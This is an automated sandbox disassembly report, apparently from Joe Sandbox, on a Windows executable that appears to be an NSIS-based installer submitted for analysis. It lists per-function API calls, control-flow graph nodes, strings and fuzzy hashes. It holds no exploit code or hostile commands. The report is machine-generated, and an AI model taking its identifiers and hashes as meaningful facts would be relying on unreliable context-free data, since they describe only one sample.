• API String ID: 3282139019-3251261122
• Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
• Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
• Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
• Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                            Control-flow Graph (rendered graph omitted)
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76F93420,00435000,00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1350935784
                                                                                                            • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                            Control-flow Graph (rendered graph omitted)
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rXKfKM0T49.exe,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\rXKfKM0T49.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\rXKfKM0T49.exe,C:\Users\user\Desktop\rXKfKM0T49.exe,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\rXKfKM0T49.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-3422350778
                                                                                                            • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                            Control-flow Graph (rendered graph omitted)
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-1230650788
                                                                                                            • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                            Control-flow Graph (rendered graph omitted)
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nspC239.tmp$C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll$Call
                                                                                                            • API String ID: 1941528284-3205120422
                                                                                                            • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 917 40264a-402663 call 402c1f 920 402ac5-402ac8 917->920 921 402669-402670 917->921 922 402ace-402ad4 920->922 923 402672 921->923 924 402675-402678 921->924 923->924 926 4027dc-4027e4 924->926 927 40267e-40268d call 406348 924->927 926->920 927->926 930 402693 927->930 931 402699-40269d 930->931 932 402732-402735 931->932 933 4026a3-4026be ReadFile 931->933 935 402737-40273a 932->935 936 40274d-40275d call 405f61 932->936 933->926 934 4026c4-4026c9 933->934 934->926 938 4026cf-4026dd 934->938 935->936 939 40273c-402747 call 405fbf 935->939 936->926 944 40275f 936->944 941 4026e3-4026f5 MultiByteToWideChar 938->941 942 402798-4027a4 call 40632f 938->942 939->926 939->936 941->944 945 4026f7-4026fa 941->945 942->922 948 402762-402765 944->948 949 4026fc-402707 945->949 948->942 951 402767-40276c 948->951 949->948 952 402709-40272e SetFilePointer MultiByteToWideChar 949->952 953 4027a9-4027ad 951->953 954 40276e-402773 951->954 952->949 955 402730 952->955 957 4027ca-4027d6 SetFilePointer 953->957 958 4027af-4027b3 953->958 954->953 956 402775-402788 954->956 955->944 956->926 959 40278a-402790 956->959 957->926 960 4027b5-4027b9 958->960 961 4027bb-4027c8 958->961 959->931 962 402796 959->962 960->957 960->961 961->926 962->926
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 963 406752-406772 GetSystemDirectoryW 964 406774 963->964 965 406776-406778 963->965 964->965 966 406789-40678b 965->966 967 40677a-406783 965->967 969 40678c-4067bf wsprintfW LoadLibraryExW 966->969 967->966 968 406785-406787 967->968 968->969
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 970 70091777-700917b6 call 70091b5f 974 700917bc-700917c0 970->974 975 700918d6-700918d8 970->975 976 700917c9-700917d6 call 70092394 974->976 977 700917c2-700917c8 call 70092352 974->977 982 700917d8-700917dd 976->982 983 70091806-7009180d 976->983 977->976 986 700917f8-700917fb 982->986 987 700917df-700917e0 982->987 984 7009182d-70091831 983->984 985 7009180f-7009182b call 70092569 call 700915b4 call 70091272 GlobalFree 983->985 988 7009187e-70091884 call 70092569 984->988 989 70091833-7009187c call 700915c6 call 70092569 984->989 1011 70091885-70091889 985->1011 986->983 990 700917fd-700917fe call 70092d37 986->990 992 700917e8-700917e9 call 70092aac 987->992 993 700917e2-700917e3 987->993 988->1011 989->1011 1005 70091803 990->1005 1002 700917ee 992->1002 994 700917f0-700917f6 call 70092724 993->994 995 700917e5-700917e6 993->995 1010 70091805 994->1010 995->983 995->992 1002->1005 1005->1010 1010->983 1014 7009188b-70091899 call 7009252c 1011->1014 1015 700918c6-700918cd 1011->1015 1020 7009189b-7009189e 1014->1020 1021 700918b1-700918b8 1014->1021 1015->975 1017 700918cf-700918d0 GlobalFree 1015->1017 1017->975 1020->1021 1022 700918a0-700918a8 1020->1022 1021->1015 1023 700918ba-700918c5 call 7009153d 1021->1023 1022->1021 1024 700918aa-700918ab FreeLibrary 1022->1024 1023->1015 1024->1021
                                                                                                            APIs
                                                                                                              • Part of subcall function 70091B5F: GlobalFree.KERNEL32(?), ref: 70091DB2
                                                                                                              • Part of subcall function 70091B5F: GlobalFree.KERNEL32(?), ref: 70091DB7
                                                                                                              • Part of subcall function 70091B5F: GlobalFree.KERNEL32(?), ref: 70091DBC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70091825
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 700918AB
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 700918D0
                                                                                                              • Part of subcall function 70092352: GlobalAlloc.KERNEL32(00000040,?), ref: 70092383
                                                                                                              • Part of subcall function 70092724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,700917F6,00000000), ref: 700927F4
                                                                                                              • Part of subcall function 700915C6: wsprintfW.USER32 ref: 700915F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3962662361-3916222277
                                                                                                            • Opcode ID: ec6f555e9f43647bfe7486438c51c0355eab11d753c6178c004ea0b9b7ea0270
                                                                                                            • Instruction ID: fd57513ab98fdb66aeb8243f975e1869204649417d479dcde3e4b7445d049bde
                                                                                                            • Opcode Fuzzy Hash: ec6f555e9f43647bfe7486438c51c0355eab11d753c6178c004ea0b9b7ea0270
                                                                                                            • Instruction Fuzzy Hash: A34101726202049EDB108F70DC84BCE37FDBB04B30F514069F907AA286DBB89484F7A8

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1027 4023e4-402415 call 402c41 * 2 call 402cd1 1034 402ac5-402ad4 1027->1034 1035 40241b-402425 1027->1035 1037 402427-402434 call 402c41 lstrlenW 1035->1037 1038 402438-40243b 1035->1038 1037->1038 1041 40243d-40244e call 402c1f 1038->1041 1042 40244f-402452 1038->1042 1041->1042 1044 402463-402477 RegSetValueExW 1042->1044 1045 402454-40245e call 4031d6 1042->1045 1049 402479 1044->1049 1050 40247c-40255d RegCloseKey 1044->1050 1045->1044 1049->1050 1050->1034 1052 40288b-402892 1050->1052 1052->1034
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspC239.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nspC239.tmp
                                                                                                            • API String ID: 2655323295-4078068100
                                                                                                            • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                            • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1053 405f0d-405f19 1054 405f1a-405f4e GetTickCount GetTempFileNameW 1053->1054 1055 405f50-405f52 1054->1055 1056 405f5d-405f5f 1054->1056 1055->1054 1057 405f54 1055->1057 1058 405f57-405f5a 1056->1058 1057->1058
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF), ref: 00405F46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-2113348990
                                                                                                            • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                            • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1059 402d44-402d6d call 406255 1061 402d72-402d74 1059->1061 1062 402d76-402d7c 1061->1062 1063 402dec-402df0 1061->1063 1064 402d98-402dad RegEnumKeyW 1062->1064 1065 402d7e-402d80 1064->1065 1066 402daf-402dc1 RegCloseKey call 4067c2 1064->1066 1067 402dd0-402dde RegCloseKey 1065->1067 1068 402d82-402d96 call 402d44 1065->1068 1073 402de0-402de6 RegDeleteKeyW 1066->1073 1074 402dc3-402dce 1066->1074 1067->1063 1068->1064 1068->1066 1073->1063 1074->1063
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
